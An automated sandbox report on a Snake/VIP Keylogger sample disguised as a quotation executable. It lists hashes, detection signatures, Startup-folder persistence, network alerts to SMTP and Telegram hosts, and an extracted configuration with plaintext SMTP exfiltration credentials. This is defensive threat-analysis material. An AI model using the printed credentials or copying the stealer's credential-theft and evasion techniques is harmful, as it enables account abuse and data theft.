
Windows Analysis Report
QUOTATION REQUIRED_Enatel s.r.l..exe

Overview

General Information

Sample name: QUOTATION REQUIRED_Enatel s.r.l..exe
Analysis ID: 1590972
MD5: f8410bcd14256d6d355d7076a78c074f
SHA1: 7ff600a40521fb8267fd305f601832785f975d40
SHA256: 7e9b9833268dae6e33c83b582ec7fb353f0dc6514f869e3228f0effa161da00f
Tags: exe, user-James_inthe_box

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • QUOTATION REQUIRED_Enatel s.r.l..exe (PID: 7716 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe" MD5: F8410BCD14256D6D355D7076A78C074F)
    • ageless.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe" MD5: F8410BCD14256D6D355D7076A78C074F)
      • RegSvcs.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 8012 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ageless.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\supergroup\ageless.exe" MD5: F8410BCD14256D6D355D7076A78C074F)
      • RegSvcs.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\supergroup\ageless.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author
00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0x2e12a:$a1: get_encryptedPassword
  • 0x2e453:$a2: get_encryptedUsername
  • 0x2df3a:$a3: get_timePasswordChanged
  • 0x2e043:$a4: get_passwordField
  • 0x2e140:$a5: set_encryptedPassword
  • 0x2f808:$a7: get_logins
  • 0x2f76b:$a10: KeyLoggerEventArgs
  • 0x2f3d0:$a11: KeyLoggerEventArgsEventHandler
  (29 further entries not shown)
Source | Rule | Description | Author
2.2.ageless.exe.fe0000.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.ageless.exe.fe0000.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.ageless.exe.fe0000.1.raw.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
2.2.ageless.exe.fe0000.1.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.ageless.exe.fe0000.1.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0x2e32a:$a1: get_encryptedPassword
  • 0x2e653:$a2: get_encryptedUsername
  • 0x2e13a:$a3: get_timePasswordChanged
  • 0x2e243:$a4: get_passwordField
  • 0x2e340:$a5: set_encryptedPassword
  • 0x2fa08:$a7: get_logins
  • 0x2f96b:$a10: KeyLoggerEventArgs
  • 0x2f5d0:$a11: KeyLoggerEventArgsEventHandler
  (21 further entries not shown)

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , ProcessId: 8012, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7804, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49918
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , ProcessId: 8012, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\supergroup\ageless.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T16:57:20.013836+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49766 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:22.657564+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49785 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:25.601214+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49808 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:28.336258+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:30.631224+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49843 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:36.898671+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49886 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:43.615561+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49937 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:46.229378+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49958 | 104.21.96.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T16:57:18.409625+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49754 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:19.378341+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49754 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:20.753551+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49772 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:35.393995+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49871 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:36.347161+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49871 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:37.659625+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49889 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:39.013805+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49901 | 132.226.247.73 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T16:57:32.292308+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.10 | 49853 | 149.154.167.220 | 443 | TCP
2025-01-14T16:57:47.106264+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.10 | 49962 | 149.154.167.220 | 443 | TCP


                  AV Detection

Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Avira: detected
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Avira: detection malicious, Label: DR/AutoIt.Gen8
Source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 2.2.ageless.exe.fe0000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | ReversingLabs: Detection: 39%
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | ReversingLabs: Detection: 39%
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Virustotal: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Joe Sandbox ML: detected
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Joe Sandbox ML: detected

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49760 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49877 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49853 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49962 version: TLS 1.2
                  Source: Binary string: vC:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbH= source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 2/oC:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F4C2A2 FindFirstFileExW,1_2_00F4C2A2
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F868EE FindFirstFileW,FindClose,1_2_00F868EE
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00F8698F
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D076
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D3A9
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F89642
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F8979D
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00F7DBBE
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00F89B2B
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,1_2_00F85C97
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D9C2A2 FindFirstFileExW,2_2_00D9C2A2
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DD68EE FindFirstFileW,FindClose,2_2_00DD68EE
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00DD698F
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD076
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD3A9
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD9642
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD979D
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00DCDBBE
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00DD9B2B
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DD5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00DD5C97
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00C2F45Dh 3_2_00C2F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00C2F45Dh 3_2_00C2F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00C2F45Dh 3_2_00C2F52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B4FB8h 3_2_062B4CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B9C38h 3_2_062B9940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B8918h 3_2_062B8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B7130h 3_2_062B6E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B4160h 3_2_062B3E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B5948h 3_2_062B5650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B2978h 3_2_062B2680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B1190h 3_2_062B0E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B8DE0h 3_2_062B8AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B4628h 3_2_062B4330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B75F8h 3_2_062B7300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B5E10h 3_2_062B5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B1658h 3_2_062B1360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B2E40h 3_2_062B2B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B92A8h 3_2_062B8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B62D8h 3_2_062B5FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B4AF0h 3_2_062B47F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B7AC0h 3_2_062B77C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B1B20h 3_2_062B1828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B3308h 3_2_062B3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B9770h 3_2_062B9478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B0338h 3_2_062B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B67A0h 3_2_062B64A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B7F88h 3_2_062B7C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B1FE8h 3_2_062B1CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B37D0h 3_2_062B34D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B0800h 3_2_062B0508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B6C68h 3_2_062B6970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B8451h 3_2_062B8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B3C98h 3_2_062B39A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B24B0h 3_2_062B21B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B5480h 3_2_062B5188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 062B0CC8h 3_2_062B09D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 02A3F45Dh 9_2_02A3F2C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 02A3F45Dh 9_2_02A3F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 02A3FC19h 9_2_02A3F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663B3C8h 9_2_0663AFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663AE01h 9_2_0663AB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06630D0Dh 9_2_06630B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06631697h 9_2_06630B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_06630673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663E87Bh 9_2_0663E5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_06630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663E421h 9_2_0663E178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663B3C8h 9_2_0663AFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663F261h 9_2_0663EFB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663EE09h 9_2_0663EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_06630853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663D719h 9_2_0663D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663F6B9h 9_2_0663F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663B3C8h 9_2_0663B2F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663DFC9h 9_2_0663DD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663FB11h 9_2_0663F868
